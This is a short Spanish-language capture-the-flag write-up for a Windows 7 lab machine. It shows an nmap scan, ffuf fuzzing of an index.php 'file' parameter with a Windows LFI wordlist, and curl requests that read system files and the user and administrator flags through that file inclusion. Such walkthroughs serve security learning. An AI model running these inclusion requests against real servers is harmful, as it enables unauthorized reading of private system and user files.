Enumeramos puertos (máquina Windows 7):
❯ nmap -sCV -p 80,135,139,445,3389,5357,49152,49153,49154,49155,49156,49157 -oN 02-targeted.txt 192.168.1.35
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-28 19:16 -03
Nmap scan report for 192.168.1.35
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-title: Index of /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
...
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsEn el puerto 80, index.php expone un parámetro file:
There is no going back!
?file=Fuzzeamos buscando LFI de Windows y obtenemos lectura arbitraria de archivos:
❯ ffuf -u 'http://192.168.1.35/index.php?file=FUZZ' -w ~/Documentos/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -fw 68,70
...
C:/Windows/win.ini [Status: 200, ...]
c:/php/php.ini [Status: 200, ...]
c:/WINDOWS/WindowsUpdate.log [Status: 200, ...]
...En C:/WINDOWS/WindowsUpdate.log aparece el nombre del usuario (runas), así que leemos directamente las flags vía el LFI:
❯ curl 'http://192.168.1.35/index.php?file=c:/users/runas/desktop/user.txt'
...
HMV{...}
...
❯ curl 'http://192.168.1.35/index.php?file=c:/users/administrator/desktop/root.txt'
...
HMV{...}
...Fin.